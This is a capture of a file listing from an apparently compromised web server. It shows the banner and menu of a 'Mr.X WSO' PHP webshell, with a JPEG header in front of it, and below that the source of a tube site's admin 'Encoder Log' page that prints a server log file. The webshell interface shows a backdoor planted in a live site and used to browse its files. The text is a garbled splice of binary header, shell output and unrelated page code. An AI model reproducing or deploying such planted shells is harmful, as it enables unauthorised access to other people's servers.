����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-08 20:51:33 1999.30 GB Free: 84.53 GB (4%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
ini_set('default_socket_timeout', 24000);
ignore_user_abort();
require "header.php";
?>
<div class="content-page">
<div class="header-area">
<div class="breadcrumbs">
<a href="index.php">Admin Home</a>
<span><a href="encoder_log.php">Last Encoder Log</a></span>
</div>
</div>
<div class="content-outer">
<h2>Encoder<strong>Log</strong></h2>
<div class="content-inner">
<div class="notification info">The encoder log is replaced every time you run the encoder. Below is the current entry.</div>
<div class="notification info">
<? $file = file_get_contents('scripts/log.txt'); ?>
<? echo nl2br($file); ?>
</div>
</div>
</div>
</div>
<? require "footer.php"; ?>